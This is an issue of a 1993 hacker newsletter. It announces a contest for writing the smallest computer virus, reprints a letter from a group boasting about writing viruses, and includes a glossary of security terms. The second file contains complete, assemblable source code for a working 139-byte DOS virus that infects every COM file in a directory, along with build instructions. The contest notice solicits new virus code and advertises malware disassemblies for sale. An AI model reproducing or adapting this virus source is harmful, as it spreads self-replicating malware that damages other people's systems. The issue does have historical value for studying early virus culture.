Chaos Digest Mercredi 17 Fevrier 1993 Volume 1 : Numero 9 Editeur: Jean-Bernard Condat (jbcondat@attmail.com) Archiviste: Yves-Marie Crabbe Co-Redacteurs: Arnaud Bigare, Stephane Briere TABLE DES MATIERES, #1.09 (17 Fev 1993) File 1--Annonce du 1er "International Computer Virus Writing Contest" File 2--Exemple d'ecriture d'un CPA sur 139 bytes File 3--Un Createur de CPA peut-il etre Patriotique? File 4--Glossaire de l'Insecurite Informatique Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are available at no cost from jbcondat@attmail.com. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], 47 rue des Rosiers, 93400 St-Ouen, France Issues of Chaos-D can also be found on some French BBS. Back issues of ChaosD can be found on the Internet as part of the Computer underground Digest archives. They're accessible using anonymous FTP from: * ftp.eff.org (192.88.144.4) in /pub/cud * red.css.itd.umich.edu (141.211.182.91) in /cud * halcyon.com (192.135.191.2) in /pub/mirror/cud * ftp.ee.mu.oz.au (128.250.77.2) in /pub/text/CuD * nic.funet.fi (128.214.6.100) in /pub/doc/cud CHAOS DIGEST is an open forum dedicated to sharing French information among computerists and to the presentation and debate of diverse views. ChaosD material may be reprinted for non-profit as long as the source is cited. Some authors do copyright their material, and they should be contacted for reprint permission. Readers are encouraged to submit reasoned articles in French, English or German languages relating to computer culture and telecommunications. Articles are preferred to short responses. Please avoid quoting previous posts unless absolutely necessary. DISCLAIMER: The views represented herein do not necessarily represent the views of the moderators. Chaos Digest contributors assume all responsibility for ensuring that articles submitted do not violate copyright protections. ---------------------------------------------------------------------- Date: Fri Feb 12 18:30:04 GMT 1993 From: jbcondat@attmail.com (Chaos Computer Club France ) Subject: File 1--Annonce du 1er "Intl. Computer Virus Writing Contest" W E L C O M E T O T H E F I R S T * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * I N T E R N A T I O N A L * * * * C O M P U T E R * * * * V I R U S * * * * W R I T I N G * * * * C O N T E S T * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * - 1 9 9 3 - Final Date For Submissions: APRIL 1, 1993 This Contest is Sponsored by: American Eagle Publications, Inc. P. O. Box 41401 Tucson, AZ 85717 USA Publisher of The Little Black Book of Computer Viruses * * * * * * * * * * * * * * * * * * * * * * * * * * * * ! DISTRIBUTE THIS FILE ALL OVER THE KNOWN UNIVERSE ! * * * * * * * * * * * * * * * * * * * * * * * * * * * * Ok, all you genius hackers out there! Here is a challenge for you. Prove your stuff! This is an INTERNATIONAL contest, and this file is being circulated all over the world, so if you want to compete, be forewarned, you've got worldwide competition. Only the best have a chance in this game. Still up to the challenge? Ok, here it is: I am writing Volume 2 of The Little Black Book of Compter Viruses. This is a study of the scientific applications of computer viruses, and their use in artificial life research, and all of that neat stuff. One of the things I want to discuss in the book is the limit on the size of a virus for a given level of functionality. So I took the TIMID virus from Volume 1 and tore it down to the bare minimum. Not good enough. I wrote a virus that worked a little differently. I tore that one down to the bare minimum. Good enough? Well maybe. But maybe not. I have some pretty compact code, but is it the absolute best? I'm guessing somebody out there can top it. Here are the rules: (1) The object of this game is to write the smallest virus you can with the required level of functionality. (2) The virus must be capable of infecting all COM files on the logged drive in the current directory of a PC, no matter how many COM files are there. It may infect them as quickly or as slowly as you like, so long as it can be demonstrated that it will do so in an hour, when running the programs in that directory one after the other in sequential order. (3) The virus must recognize itself and avoid re-infecting files that have been infected. At most, only one in fifty thousand files should get accidently re-infected, assuming that the data in unknown COM files is random. (4) The virus must terminate gracefully if it cannot find a file to infect. (5) The virus must not destroy any of the code in any file which it infects. It must allow that code to execute properly, or refuse to infect a file. (6) The virus must be self-contained. It cannot hide code in some common location on disk. (7) The virus must function properly under MS-DOS 5.0 with no TSR's resident, and nothing loaded high. (8) The size will be determined by the larger of (A) the number of bytes the virus code itself takes up in an infected file, and (B) the largest number of bytes the virus adds to a program when it infects it. The best code I have for a virus that follows these rules right now is 139 bytes long. Both source and executable are included in the ZIP, named LITTLE.ASM and LITTLE.COM. In the event of a tie for size, originality and ingenuity of the code will break the tie. All judges decisions are final. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ The winner will receive the following: (1) A $100 CASH REWARD. (2) Your code will be published in "The Little Black Book of Computer Viruses", Volume 2. (3) I will give you credit for the code and for winning the International Virus Contest in the book, using either your real name or an alias, your choice, published in the book. (4) Your name will be posted on the MISS bulletin board as the contest winner. (5) A free copy of "The Little Black Book of Computer Viruses", Volume 2, and a one year subscription to Computer Virus Developments Quarterly ($95 value). Three honorable mention winners will receive a free copy of The Little Black Book of Computer Viruses, Volume 2. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ You may make an entry in two ways: (1) Mail your entry on a PC format floppy disk to American Eagle Publications, Inc., PO Box 41401, Tucson, AZ 85717 USA. (2) Upload your entry to the M.I.S.S. bulletin board at (805)251-0564 in the USA. Log on as GUEST, password VIRUS, last 4 digits of phone number 0000, and upload to the CONTEST UPLOADS directory. A valid entry consists of the following items: (A) Complete source code for a virus, which can be assembled using either TASM, MASM, or A86. If you use another assembler and don't know if one of the above will work, then send the assembler along with the submission. If you do anything tricky that we may not understand, you must explain it in comments in the assembler source. (B) A statement of who you are (aliases accepted) and how to get in touch with you in case you win the contest. This information will be kept strictly confidential, and encrypted at all times. By submitting an entry to the contest, you agree that the copyright to your entry will be considered the property of American Eagle Publications. The copyright to any losing entry will be returned to the owner upon written request. In the event that you win or receive honorable mention in the contest, the copyright to the code will remain the property of American Eagle Publications, Inc. You may submit your entry encrypted with PGP 2.1 if you desire. Use the following public key to encrypt: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.1 mQBNAitZ9w4AAAECAOXJYOsJNavAAWFBRwf4/u0QWMJ9IHj8eajgOfDRdlCNwEBJ wMs1vb5GcdJCaeoCgBR3Xxzh6oEo2nrwfru8mqMABRG0CE1BTHVkd2ln =P6d4 -----END PGP PUBLIC KEY BLOCK----- Go to it! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ D O N ' T M I S S O U T ! ! ! Get Your Very Own International Virus Writing Contest 1993 T-SHIRT Great fun to wear to your local user's group meeting, or the next computer security conference you attend. Sure to get people's attention and initiate lots of interesting conversation. Specify Small, Medium, or Large. Only $9.95 from American Eagle Publications, Inc. P.O. Box 41401 Tucson, AZ 85717 (US Customers please add $3.00 for UPS delivery) (Overseas customers please add $7.50 for airmail delivery) (Overseas customers please add $3.00 for surface delivery) (AZ residents add 5% sales tax) +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ American Eagle Publications, Inc., gives you first class information to learn the ins and outs of viruses. You may order any of the following items from American Eagle Publications, PO Box 41401, Tucson, AZ 85717. (Shipping is $2.00 to the US, $7.50 for overseas airmail.) AZ residents add 5% sales tax. The Little Black Book of Computer Viruses, Volume 1, by Mark Ludwig. This award-winning book will teach you the basics of how viruses work in no-nonsense terms. 192 pgs., $14.95. The Little Black Book of Computer Viruses Program Disk. All of the programs in the book, both source code and executables, $15.00. Computer Virus Developments Quarterly, This takes up where the Little Black Book leaves off, providing the reader with quarterly updates on viruses and anti-virus technology. For the advanced security specialist or programmer. One year subscription with diskettes, $75.00 postpaid, overseas airmail add $10.00. Computer Virus Developments Quarterly, current single issue, $25.00. (Please inquire as to price and availability of back issues) Technical Note #1: The Pakistani Brain Virus, a complete disassembly and explanation. This is one of the first boot sector viruses ever written, and the first stealth boot sector virus. It hides on floppy disks and inserts the label (c) Brain on the disk. 32 page booklet and diskette with assembler source and compiled virus, $20.00. Technical Note #2: The Stoned Virus, a complete disassembly and explanation. The Stoned is the world's most successful boot sector virus. It infects floppy disks and hard disks. Find out what makes it tick. 24 page booklet and diskette with assembler source, compiled virus, and detection tool, $20.00. Technical Note #3: The Jerusalem Virus, a complete disassembly and explanation. Jerusalem is an old but highly effective virus which hides in memory, and infects every program you try to execute. It starts deleting programs on Friday the 13th. Booklet and diskette with assembler source and compiled virus, $20.00. Technical Note #4: How to Write Protect an MFM Hard Disk. The only hard-and-fast way to stop viruses from spreading is to physically write-protect your disk. This tech note tells you how to do it for the older MFM style drives. Some companies sell such devices for hundreds of dollars, but this booklet will tell you how to do the job for under $20. Complete with theory, circuit diagrams, and a circuit board layout. No diskette, $12.00. How to Become a Virus Expert, a 60 minute audio tape by author Mark Ludwig tells you how to get hold of the critical information you need to protect your computers, and stop relying on some anti- virus product developer to spoon-feed you. $10.00. Wanted: Translators for these works in all languages and outlets for these works in all countries. An opportunity for big $$ awaits the enterprising person. Please contact us. +++++++ No Virus Contest is complete without POLITICAL COMMENT: Freedom is only free if it is VOLUNTARY. If you live in a "democratic" nation that will not allow secession, then you DO NOT live in a free country. The democracies of this world are learning how to become tyrannies. Support a Secession Ammendment for your constitution, before it is too late and you wish you had. Secession is the only logical way to short-circuit the trend toward big government and tyranny, short of all-out civil war. +++++++ ------------------------------ Date: Fri Feb 12 18:30:04 GMT 1993 From: jbcondat@attmail.com (Chaos Computer Club France ) Subject: File 2--Exemple d'ecriture d'un CPA sur 139 bytes ;A small (139 byte) virus with minimal required functionality. ;This Virus for research purposes only. Please do not release! ;Please execute it only on a carefully controlled system, and only ;if you know what you're doing! ;An example for ;####################################################### ;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST # ;# 1 9 9 3 # ;# sponsored by # ;# American Eagle Publications, Inc. # ;####################################################### ;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;" ;Link as "TLINK /T LITTLE;" ;Basic explanation of how this virus works: ; ;The virus takes control when the program first starts up. All of its code ;is originally located at the start of a COM file that has been infected. ;When the virus starts, it takes over a segment 64K above the one where the ;program was loaded by DOS. It copies itself up there, and then searches ;for an uninfected file. To determine if a file is infected, it checks the ;first two bytes to see if they are the same as its first two bytes. It ;reads the file into memory right above where it is sitting (at 100H in the ;upper segment). If not already infected, it just writes itself plus the ;file it infected back out to disk under the same file name. Then it moves ;the host in the lower segment back to offset 100H and executes it. .model tiny ;Tiny model to create a COM file .code ;DTA definitions DTA EQU 0000H ;Disk transfer area FSIZE EQU DTA+1AH ;file size location in file search FNAME EQU DTA+1EH ;file name location in file search ORG 100H ;************************************************************************* ;The virus starts here. VIRSTART: mov ax,ds add ax,1000H mov es,ax ;upper segment is this one + 1000H mov si,100H ;put virus in the upper segment mov di,si ;at offset 100H mov cl,BYTE (OFFSET HOST AND 0FFH) ;can't code this with TASM mov cl,8BH ;we can assume ch=0 rep movsb ;this will louse the infection up if run ;under debug! mov ds,ax ;set ds to high segment push ds mov ax,OFFSET FIND_FILE push ax retf ;jump to high memory segment ;Now it's time to find a viable file to infect. We will look for any COM ;file and see if the virus is there already. FIND_FILE: xor dx,dx ;move dta to high segment mov ah,1AH ;so we don't trash the command line int 21H ;which the host is expecting mov dx,OFFSET COMFILE mov ch,3FH ;search for any file, no matter what ;attribute (note: cx=0 before this instr) mov ah,4EH ;DOS search first function int 21H CHECK_FILE: jc ALLDONE ;no COM files to infect mov dx,FNAME ;first open the file mov ax,3D02H ;r/w access open file, since we'll want to write to it int 21H jc NEXT_FILE ;error opening file - quit and say this ;file can't be used mov bx,ax ;put file handle in bx, and leave it there ;for the duration mov di,FSIZE mov cx,[di] ;get file size for reading into buffer mov dx,si ;and read file in at HOST in new segment ;(note si=OFFSET HOST) mov ah,3FH ;DOS read function int 21H mov ax,[si] ;si=OFFSET HOST here jc NEXT_FILE ;skip file if error reading it cmp ax,WORD PTR [VIRSTART] ;see if infected already jnz INFECT_FILE ;nope, go do it mov ah,3EH ;else close the file int 21H ;and fall through to search for another file NEXT_FILE: mov ah,4FH ;look for another file int 21H jmp SHORT CHECK_FILE ;and go check it out COMFILE DB '*.COM',0 ;When we get here, we've opened a file successfully, and read it into ;memory. In the high segment, the file is set up exactly as it will look ;when infected. Thus, to infect, we just rewrite the file from the start, ;using the ;image in the high segment. INFECT_FILE: xor cx,cx mov dx,cx ;reset file pointer to start of file mov ax,4200H int 21H mov ah,40H mov dx,100H mov cx,WORD PTR [di] ;adjust size of file for infection add cx,OFFSET HOST - 100H int 21H ;write infected file mov ah,3EH ;close the file int 21H ;The infection process is now complete. This routine moves the host ;program down so that its code starts at offset 100H, and then transfers ;control to it. ALLDONE: mov ax,ss ;set ds, es to low segment again mov ds,ax mov es,ax push ax ;prep for retf to host shr dx,1 ;restore dta to original value mov ah,1AH ;for compatibility int 21H mov di,100H ;prep to move host back to original location push di mov cx,sp ;move code, but don't trash the stack sub cx,si mov cx,0FE6FH ;hand code the above to save a byte rep movsb ;move code retf ;and return to host ;*************************************************************************** ;The host program starts here. This one is a dummy that just returns control ;to DOS. HOST: mov ax,4C00H ;Terminate, error code = 0 int 21H HOST_END: END VIRSTART ------------------------------ Date: 29 Jan 93 15:59:00 +0000 From: ercm20@festival.edinburgh.ac.uk (Sam Wilson ) Subject: File 3--Un Createur de CPA peut-il etre Patriotique? Repost: Virus-L Digest #6.16 (4 Fev 93) The following letter and editorial response appears in the February 1993 issue of the UK magazine 'Personal Computer World' under the heading "Spreading viruses": We are a bunch of programmers who, depressed with the lack of viruses that have originated in England, have sought to change matters. We presently write viruses for the PC, Archimedes and Atari ST. We have increased the few viruses written in England by about 25, though this number is increasing all the time as our programmers churn out more quality computer viruses. Although there are many viruses about we hope to dominate the UK 'market'. Won't it be nice, though, for England to have at least one export? Finally, we as an organisation like to stress that, contrary to public opinion, we are *not* boring people who wear anoraks, nor are we depraved people who were beaten as children and so grew up with a hatred of humanity. We are highly intelligent and good at programming and are just ordinary people. But we are gonna get you soon! ARCV (Association of Really Cruel Viruses) [And the editor replies:] You say you're not depraved people? Perhaps you weren't beaten as children, but as far as we're concerned you should be beaten as adults. I wish it were the April issue... Sam Wilson Network Services Division Computing Services, The University of Edinburgh Edinburgh, Scotland, UK ------------------------------ Date: Fri, 12 Feb 93 23:26:52 +0000 From: tegra!vail@uunet.UU.NET (Johnathan Vail ) Subject: File 4--Glossaire de l'Insecurite Informatique Repost from: Virus-L Digest #6.26 (16 Feb 1993) ________________________________________________________________________ Glossary of Computer Insecurity Compiled by Johnathan Vail (vail@tegra.com) Created by several people on comp.virus newsgroup ________________________________________________________________________ async interrupt (attack) - to exploit system vulnerabilities arising from deficiencies in the interrupt management facilities of an operating system. back door - This is an undocumented feature added to a product which can allow those who know about it to gain access to features that are otherwise protected. The original Tempest video game was supposed to have a key sequence that would allow the author of the firmware to get free games in an arcade. Some military systems are rumored to have back doors in their software that prevents their being used against the countries that built them. blivet (attack) - A denial-of-service attack performed by hogging limited resources that have no access controls (for example, shared spool space on a multi-user system). [Classically defined as "ten pounds of horsesh*t in a five pound bag"] browsing - Gaining unauthorized read-only access to files. C2 Catch-22 - Refers to the paradox that all federal computers are required to be certified to the C2 level of Trust (or better) by 1992 (especially if they are to be permitted access to a network), yet because no C2 certification has ever been performed with the network software active, NSA will revoke the certification of any system as soon as it is connected to a network. [Also "C2-by-'92 Catch-22".] cascading - To gain additional privileges on a host (or within a process) by using those privileges legitimately (if perhaps unwisely) granted to casual users. crayola books - A disparaging reference to the "rainbow books", commonly used when referring to the upcoming rewrite of NSA's technical computer security guidelines. crypt (attack) - Stealing the system password file and looking for known encrypted passwords. data diddling - To alter another's data (especially, to do so subtly so it will not be detected); a major breach of the hacker ethic. denial-of-service attack - Any method which an intruder might use to injure authorized users of a system by making its facilities unavailable. Often easier to accomplish than hijacking a privileged account. dictionary (attack) - Trying a dictionary of commonly used or vendor installed passwords. Easter Egg - This is a usually benign feature added to a product by the programmer without official knowledge or consent. One example of the is the 'xyzzy' command in Data General's AOS operating system. Another is the "RESIST THE DRAFT" message in an unused sector of Apple Logo. ethical hacker - Someone who espouses the view that he/she may "ethically" penetrate any computer or network so long as no data is altered. [Colloquially among computer security professionals: a dead hacker (or one who has ceased hacking).] leapfrog (attack) - Using userid and password information obtained illicitly from one host (e.g., downloading a file of account IDs and passwords, tapping TELNET, etc.) to compromise another host. Also, to TELNET through one or more hosts in order to confuse a trace (standard cracker procedure). masquerading - To assume the identity of another user to gain unauthorized access to a host or network. mockingbird - Software that intercepts communications (especially logon processes) between users and hosts and provides system-like responses to the users while obtaining information (especially account IDs and passwords). pest - A set of instructions that self-replicates uncontrollably, eventually rendering a network or system unusable via a blivet attack. [sometimes called "wabbits"] phage - An autonomous program that inserts malicious code into other autonomous programs (e.g., a computer worm or probe that carries a virus or trojan horse program). polymorphic virus - 1. A virus using variable encryption with a variable decryption routine to avoid detection by its "signature". V2P6, Whale, Maltese, Amoeba, Russian Mutant and PC-Flu 2 are examples. 2. Any virus that changes it's behaviour such as infect different types of host or change their mode of operation. A virus that infects both .COM and .EXE programs as well as boot sectors can be considered polymorphic. probe - A non-self-replicating, autonomous program (or set of programs) that has the ability to execute indirectly through a network or multi-partition computer system (e.g., various hacker utilities). rainbow books - NSA's technical computer security guidelines. So named because each of the books is published with a different color cover. [See "crayola books".] scavenging - To exploit unerased residual data. The controversy with the Prodigy [users finding pieces of the their data in the STAGE.DAT file] service is an alleged example of this. spoofing - An attack which relies on the inability of users or computer systems to verify the identity or location of a communication partner. A `mockingbird' spoofs the computer's login sequence to fool a user; some cracking software repeatedly spoofs human login actions to fool the computer. stealth virus - A type of virus that attempts to hide its existence. A common way of doing this on IBM PCs is for the virus to hook itself into the BIOS or DOS and trap sector reads and writes that might reveal its existence. trapdoor - A method of bypassing a sequence of instructions, often some part of the security code (e.g. the computer logon). time bomb - This is code or a program that checks the systems clock in order to trigger its active symptoms. The popular legend of the time bomb is the programmer that installs one in his employer's computers to go off in case he is laid off or fired. trojan (horse) - This is some (usually nasty) code that is added to, or in place of, a harmless program. This could include many viruses but is usually reserved to describe code that does not replicate itself. unknown system-state (attack) - To exploit the conditions that occur after a partial or total system crash (e.g., some files remain open without an end-of-file condition allowing an intruder to obtain unauthorized access to other files by reading beyond the real EOF when service is resumed). virus - a piece of code that is executed as part of another program and can replicate itself in other programs. The analogy to real viruses is pertinent ("a core of nucleic acid, having the ability to reproduce only inside a living cell"). Most viruses on PCs really are viruses. worm - An autonomous program (or set of programs) that can replicate itself, usually over a network. A worm is a complete program by itself unlike a virus which is either part of another program or requires another program's thread of execution to operate. Robert Morris's program, the Internet Worm, is an example of a worm although it has been mistakenly identified in the popular media as a virus. ________________________________________________________________________ _____ | | Johnathan Vail vail@tegra.com (508) 663-7435 |Tegra| jv@n1dxg.ampr.org N1DXG@448.625-(WorldNet) ----- MEMBER: League for Programming Freedom (league@prep.ai.mit.edu) ------------------------------ End of Chaos Digest #1.09 ************************************